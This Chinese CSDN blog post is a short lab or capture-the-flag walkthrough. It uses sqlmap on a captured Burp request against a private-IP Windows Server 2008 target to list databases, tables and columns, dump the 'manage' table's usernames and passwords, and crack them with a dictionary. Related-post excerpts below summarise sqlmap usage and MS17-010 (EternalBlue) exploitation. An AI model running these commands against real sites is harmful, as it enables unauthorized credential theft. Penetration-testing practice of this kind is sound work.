sqlmap获取管理密码和用户名

已于 2022-03-11 14:40:59 修改
阅读量7.3k 收藏 18
点赞数 1
分类专栏: cff 文章标签: 安全 sql 数据库
于 2022-03-11 00:13:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51558394/article/details/123414706
版权

Sqlmap 数据库注入 渗透测试 Windows Server 2008 R2 安全漏洞
关键词由CSDN通过智能技术生成

Sqlmap 获取flag

被攻击机172.16.0.216

被攻击机windows servesr2008-r

攻击机192.168.140.134

将该bp代理所得以文件形式命名为test.txt保存在虚拟机桌面

接下来sqlmap -r test.txt

发现数据库版本5.6+

接下来进入数据库列表

sqlmap -r test.txt –dbs

发现有8个数据库

sqlmap -r test.txt --current-db //查看当前数据库所使用的数据库为csma

sqlmap -r test.txt -D cmsa –tables

对该数据库进行表的爆破

然后根据英文意思我们选择来进行爆破表manage

sqlmap -r test.txt -D cmsa -T manage --columns  对表的东西进行爆破

接下来对column中的name和password user爆破

sqlmap -r test.txt -D cmsa -T manage -C password,name,user –dump

获取密码然后用字典解析

田清炜
关注
专栏目录
通过sqlmap数据库获取虚拟机架站的用户名密码
Gemini372的博客
12-01 999
虚拟机网站的用户名密码获取 关于一个网站的用户名密码获取,我们不由得需要提起一个经常需要用的一个方法了————SQL注入 环境搭建 1,一个不知道用户名密码的虚拟机 这里用的是CentOS5.2small虚拟机 2,攻击机:Kali ...
利用sqlmap注入获取网址管理员账号密码
WINDY_PACE的博客
04-21 6627
sqlmap 靶场的攻击注入利用。
sqlmap注入总结
weixin_34321753的博客
08-22 1489
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
sqlmap的基本命令使用
热门推荐
Leonardo DiCaprio‘s spring
03-24 5万+
本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                 sqlmap.py -u 登
通过SQLmap数据库获取虚拟机架站的用户名密码
07-13
通过SQLmap数据库获取虚拟机架站的用户名密码
利用sqlmap获取网站帐号密码
weixin_66945507的博客
04-27 5087
利用sqlmap获取网站后台帐号密码
SQLmap用户手册
zhangge3663的博客
04-09 505
当给sqlmap这么一个url的时候,它会: 1.判断可注入的参数; 2.判断可以用哪种SQL注入技术来注入; 3.识别出哪种数据库; 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,既可以根据返回页面判断条件真假的注入; 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3.基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4.联合查询注入,可以使用u
sqlmap,扫描网站数据库并得到用户名密码
专注前端技术,包括Web端、移动端、小程序、APP
02-04 1万+
接着上篇文章,你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap,使用sqlmap对一个网站解剖分析! SqlMap的程序允许检查网站的SQL注入漏洞,XSS漏洞的存在,并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在漏洞。 如果该站点容易受到SQL注入的攻击,则骇客可以进行以下攻击: 从数据库接收信息,包括转储(整个)数...
【渗透测试】|sqlmap工具注入-基于dvwa的sql injection
最新发布
yangdan_jiayou的博客
03-27 721
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
Sqlmap获取用户名与服务器.docx
04-14
"Sqlmap获取用户名与服务器" Sqlmap 是一款功能强大且功能多样的渗透测试工具,特别是在数据库安全测试方面。通过 Sqlmap,我们可以轻松地检测数据库系统的漏洞,从而获取数据库用户名密码Sqlmap 工具的使用...
sqlmap获取mysql数据库_(五)SQLMap工具检测SQL注入漏洞、获取数据库中的数据
weixin_39578516的博客
02-03 1052
目录结构利用SQLMap自动化工具,可判断某个带参数的url是否可被SQL注入,继而获取数据库和服务器的相关敏感数据和信息(如:库、表、列、字段值、数据库和服务器的名称&版本...)。本文以本地环境搭建的Web漏洞环境(OWASP Mutillidae+phpStudy)进行测试,具体操作流程如下:Mutillidae漏洞程序备注说明:因操作系统中同时安装有Python2和Python3的...
sqlmap+nikto进行渗透测试获取管理员账号密码操作实例
WEL测试
10-18 8938
首先,在百度搜索输入框输入:inurl:asp?id=,在搜索列表中选择连接类似如下的url:http://域名/about.asp?id=325。 其次,打开BT5,打开sqlmap,执行如下格式命令:./sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user,执行命令如下截图: 该命令是获取web服务操作系统、w
SQL-SqlMap注入
2201_75331136的博客
03-14 174
SQL-SqlMap注入
sqlmap
weixin_44722125的博客
04-09 483
sql 漏洞常见防范措施 sqlmap 工具使用入门及案例介绍 经典用法
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4361
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
《MS17-010(永恒之蓝)—漏洞复现及防范》
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
MS17-010(永恒之蓝)复现
weixin_57151696的博客
07-06 188
0x00 漏洞环境 攻击机:kali(IP:192.168.244.1) 目标:win7 (IP:192.168.244.136) 工具:nmap、metasploit 0x01 漏洞介绍 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 0x02 影响范围
MS17_010 漏洞利用与安全加固
theRavensea
03-18 2176
MS17_010 漏洞后门利用程序 EternalBlue(从目前使用情况来看,相对比较稳定)可影响 Windows 7和 Windows Server 2008 大部分版本的操作系统,无需认证权限就能实现系统入侵控制;插件工具DoublePulsar 可以远程向目标控制系统注入恶意DLL 或 Payload程序。综合利用这两个工具,入侵成功之后可以对目标系统执行 Empire/Meterpreter 反弹连接控制。在此过程,还需要NSA 使用的类似 Metasploit 的漏洞利用代码攻击框架 FuzzB
MS17-010漏洞复现
Al345__的博客
07-01 1459
1、永恒之蓝介绍:永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
sqlmap如何获得数据库密码
06-11
SQL注入成功后,可以使用SQLMap获取数据库密码。以下是获取数据库密码的基本步骤: 1. 首先,使用SQLMap进行探测并确认数据库注入漏洞是否存在。可以使用以下命令进行探测: ``` sqlmap -u <target-URL> --dbs ``` 2. 确认存在注入漏洞之后,可以使用以下命令来获取数据库中的所有表: ``` sqlmap -u <target-URL> -D <database-name> --tables ``` 其中,`<database-name>`是你想要访问的数据库名称。 3. 根据需要选择你想要访问的表,并使用以下命令来获取表中的所有列: ``` sqlmap -u <target-URL> -D <database-name> -T <table-name> --columns ``` 其中,`<table-name>`是你想要访问的表名称。 4. 根据需要选择你想要访问的列,并使用以下命令来获取列中的数据: ``` sqlmap -u <target-URL> -D <database-name> -T <table-name> -C <column-name> --dump ``` 其中,`<column-name>`是你想要访问的列名称。 5. 如果你想要获取特定用户的密码,可以使用以下命令来筛选出该用户的密码: ``` sqlmap -u <target-URL> -D <database-name> -T <table-name> -C <column-name> --dump -w "username='<username>'" ``` 其中,`<username>`是你想要获取密码用户名。 请注意,这些命令只是SQLMap获取数据库密码的基本用法。具体步骤取决于你想要访问的数据库和表。同时,需要强调的是,这种方法只适用于合法的授权情况下,任何未经授权的访问都是违法的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值